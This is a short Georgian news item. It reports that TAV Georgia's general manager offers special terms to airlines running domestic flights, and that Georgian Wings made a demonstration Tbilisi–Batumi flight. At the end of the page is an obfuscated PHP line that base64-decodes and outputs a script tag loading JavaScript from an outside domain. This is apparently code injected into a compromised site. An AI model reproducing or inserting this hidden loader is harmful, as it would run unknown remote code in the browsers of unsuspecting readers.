celsiusi
ავერსი საქკაბელი

„ტავ ჯორჯია“ მზად არის, განსაკუთრებული პირობები შესთავაზოს არა მხოლოდ Geosky-ს, არამედ ყველა ავიაკომპანიას, რომელიც ჩვენი მართვადი აეროპორტებიდან ადგილობრივი ავიარეისების შესრულებას გეგმავს, – ამის შესახებ თბილისისა და ბათუმის საერთაშორისო აეროპორტების ოპერატორი კომპანიის, „ტავ ჯორჯიის“ გენერალურმა მენეჯერმა, თეა ზაქარაძემ განაცხადა.

ზაქარაძის თქმით, სასიხარულოა, რომ ხანგრძლივი პაუზის შემდეგ თბილისის საერთაშორისო აეროპორტიდან ბათუმის მიმართულებით ფრენები იწყება.

„ჩვენთვის, როგორც ორივე აეროპორტის ოპერატორი კომპანიისთვის, ძალიან მნიშვნელოვანია პირდაპირი ავიარეისები. ეს ძალიან დიდი კომფორტია მგზავრებისთვის. მზად ვართ, განსაკუთრებული პირობები შევთავაზოთ არა მხოლოდ Geosky-ს, არამედ ყველა ავიაკომპანიას, რომელიც ჩვენი მართვადი აეროპორტებიდან ადგილობრივი ავიარეისების შესრულებას გეგმავს“, – განაცხადა თეა ზაქარაძემ.

ავიაკომპანია Geosky-ს სამგზავრო მიმართულებამ, Georgian Wings-მა დღეს თბილისი-ბათუმის მიმართულებით პირველი საჩვენებელი ფრენა შეასრულა და სამგზავრო რეგულარული ფრენების პროექტის პრეზენტაცია გამართა.

401
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");